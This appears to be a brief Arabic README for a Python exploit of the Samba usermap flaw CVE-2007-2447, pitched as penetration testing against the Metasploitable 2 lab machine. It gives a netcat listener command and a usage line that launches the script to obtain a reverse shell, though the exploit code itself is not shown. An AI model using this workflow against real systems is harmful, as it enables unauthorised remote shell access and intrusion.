
نص بايثون لاستغلال الثغرة CVE-2007-2447 (Samba usermap) الذي يوفر شل عكسية مع حمولات قابلة للتخصيص، مصمم لاختبار الاختراق على الأهداف الضعيفة مثل Metasploitable 2.
لاختبار السكربت، أوصيك باستخدام الجهاز الافتراضي "metasploitable 2" المتاح هنا. سيظهر السكربت قشرة عكسية إذا نجح الاستغلال. للحصول على الاتصال، فقط افتح جلسة netcat مثل:
netcat -lnvp <port>
py CVE-2007-2447.py 192.168.1.38 1337 192.168.1.14
وعلى netcat الخاص بي :
netcat -lnvp 1337
النتيجة :
netcat :
alt text
وعلى السكربت:
alt text
استخدمت حمولة من ورقة غش. الرابط متاح هنا. يمكنك استبدالها بحمولات أخرى.